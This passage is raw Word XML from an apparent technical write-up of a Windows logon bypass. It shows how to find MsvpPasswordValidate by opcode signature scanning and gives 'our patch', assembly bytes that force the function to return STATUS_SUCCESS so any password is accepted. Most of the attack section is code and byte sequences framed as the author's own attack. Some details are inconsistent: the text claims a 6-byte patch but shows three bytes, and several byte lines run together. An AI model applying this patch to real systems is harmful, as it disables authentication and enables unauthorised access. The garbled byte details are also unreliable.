          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>, &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ComputedHash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15260FF4" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Compare hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703ED0F7" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="863" w:right="1569" w:hanging="418"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>memcmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ComputedHash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>, &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>StoredPasswordHash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="40A170"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">) == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="40A170"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>STATUS_SUCCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// 0x00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E37EF4" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t xml:space="preserve">else </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168A2DC9" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="873" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>STATUS_WRONG_PASSWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// 0xC000006A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0B3503" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFD8863" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="276" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F65FEB3" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>4.2 Signature Scanning: Version-Independent Hooking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E916D6" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Different Windows versions have different memory layouts, stack frame sizes, and optimizations. Rather than hardcoding offsets, the attack uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">opcode signature scanning </w:t>
      </w:r>
      <w:r>
        <w:t>to locate the target function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371DC252" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Example Signature: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The driver scans for a specific byte sequence that uniquely identifies </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>MsvpPasswordValidate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB48E92" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="3845"/>
        </w:tabs>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>48 8D 15 ?? ?? ?? ??</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">; lea </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>rdx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>, [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>rel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CE3528" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="4603" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>48 C1 E9 03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>shr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>rcx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>, 3 F3 A4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">; rep </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>movsb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09DA0944" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>This is an MD4 hash computation routine and is unique enough to identify the function across Windows versions (with minor variations for string offsets).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA21EFE" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>Once found via signature scanning, the function’s base address is calculated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428BACF9" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="279" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">PVOID </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>FunctionBase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>= (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PUCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PatternFound</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OffsetWithinFunction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037796DD" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>4.3 The Patch: Assembly-Level Logic Inversion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE35DED" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>The simplest and most effective patch is to replace the function’s critical logic with a forced success:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36970512" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="235" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="2510" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>; Original comparison instruction (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>approx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6 bytes) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>48 3B C1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>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cmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve"> rax, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>rcx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">(compare password hash) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>75 05</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>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jnz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve"> $+7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">(jump if not equal) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>33 C0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>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xor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:tab/>
        <w:t>(set SUCCESS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAA5150" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>; Our patch (exactly 6 bytes, replaces the above)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FE58BB" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2432"/>
          <w:tab w:val="center" w:pos="5414"/>
        </w:tabs>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>31 C0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>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xor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">(set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to 0 = STATUS_SUCCESS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029EE2A4" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="1962"/>
          <w:tab w:val="center" w:pos="4838"/>
        </w:tabs>
        <w:spacing w:after="122" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>C3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>; ret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:tab/>
        <w:t>(return immediately)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246965DA" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Why 6 bytes? </w:t>
      </w:r>
      <w:r>
        <w:t>We must overwrite exactly 6 bytes (the size of the original code) to maintain instruction alignment and avoid partial instruction overwrites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A751F7B" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The logic: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>XOR EAX, EAX</w:t>
      </w:r>
      <w:r>
        <w:t>: Sets EAX to 0 (STATUS_SUCCESS) by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A45A6DE" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
